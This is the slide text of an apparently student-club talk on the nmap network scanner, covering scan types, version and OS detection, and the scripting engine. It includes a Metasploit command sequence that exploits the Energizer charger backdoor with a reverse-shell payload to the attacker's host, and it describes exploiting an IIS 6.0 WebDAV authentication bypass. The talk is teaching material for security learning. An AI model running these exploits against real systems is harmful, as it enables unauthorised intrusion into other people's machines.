4/13/2010

 CSS Meeting  Stephen Crane on Programming Contests  1pm  Building 8 room /11/10

 CSS Programming Contest  1pm  CS Lab, Building 8 05/11/10

 CBARN!  Buy your tickets today! ▪ $30  Great food!  Learn more about other clubs and the College of Business  This 7pm 05/11/10

 Programming Contest 05/11/10

 “Network Mapper” (scanner)  Discovery  Identification  Security Auditing 05/11/10

 Scan types  Ping:-sP  TCP:-sT  UDP:-sU  SYN:-sS  Idle:-sI 05/11/10

 Ping:-sP  Checks 80, 443 and icmp if root  Good way to map the machines on the network 05/11/10

 TCP:-sT  TCP Connect scan  Full TCP handshake  Very “noisey” 05/11/10

 UDP:-sU  Gives port info only  Often forgotten  SLOW 05/11/10

 SYN:-sS  “half open” scanning  “quiet” scan  Most IDS are on the look out for it 05/11/10

 Idle:-sI  Zombie scanning  Scans a machine using another  As far as the scanned machine knows, our computer never communicated with it  Only located ports, no version info  Doesn’t spoof mac address 05/11/10

Advanced Features  Version information (-sV)  Attempts to identify the version of the discovered service  Can make mistakes  OS Detection (-O)  More or less accurate  Can make mistakes

Advanced Features  Verbosity (-v[vv])  Gives more info  Very useful  grep is your friend  Runtime interaction  v/V:Adjust verbosity  Spacebar: Print status message

 Idle:-sI 05/11/10 Target Zombie Us

Demo

 Scripting engine  Custom written scans  Vulnerability scanning & exploitation (kinda)  Written in LUA 05/11/10

 Two types:  Service scripts  Host scripts  Nine categories  Auth  Default  Discovery  External  Intrusive  Malware  Safe  Version  Vuln 05/11/10

 Scripts location:  /usr/share/nmap/scripts  /usr/local/share/nmap/scripts  C:\Program Files\Nmap\scripts  nmap –script-updatedb  Command format:  nmap --script= target 05/11/10

Scripts  Energizer Trojan  IIS webDAV

Energizer Trojan Script  A backdoor was found in the Energizer Charger program  Might have been a mistake  We don't really care  Listens on port 7777 of the infected machine  Detection is now built-in to version scan  nmap -sV -p7777 target

Energizer Trojan Script  Metasploit!  Metasploit has a module that will exploit the trojan > use exploit/windows/backdoor/energizer_duo_payloa d > set rhost target.ip > set payload windows/meterpreter/reverse_tcp > set lhost your.ip > exploit

IIS WebDAV script  WebDAV allows users on a website to modify files on the webserver  A vulnerability was found in IIS 6.0 WebDAV implementation  Allows remote authentication bypass due to a parsing error of UNICODE characters  Nmap has a script!

IIS WebDAV script  The script can identify vulnerable files on the webserver  nmap --script http-iis-webdav-vuln.nse target

IIS WebDAV script  Let's exploit it manually  The vulnerable server improperly parses the UNICODE character '/' (0xc0 0xaf)  We'll use telnet to exploit

Extra Stuff  “default” script scan (-sC)  Scans using a bunch of different scripts  Very noisy, very intrusive  Gives you a lot of info  “Aggressive” scan (-A)  Uses -O -sV -sC --traceroute  Again, very noisy  But lots and lots of info

Closing remarks  nmap is a tool you should be familiar with  There are many more techniques and scans that I did not cover  Be mindful of who you are scanning (and any laws regarding scans)

Questions?

References  Nmap main site   nmap.org/book/nse.html  Comprehensive Guide to nmap  ml ml  SkullSecurity   WebDAV   Energizer Trojan 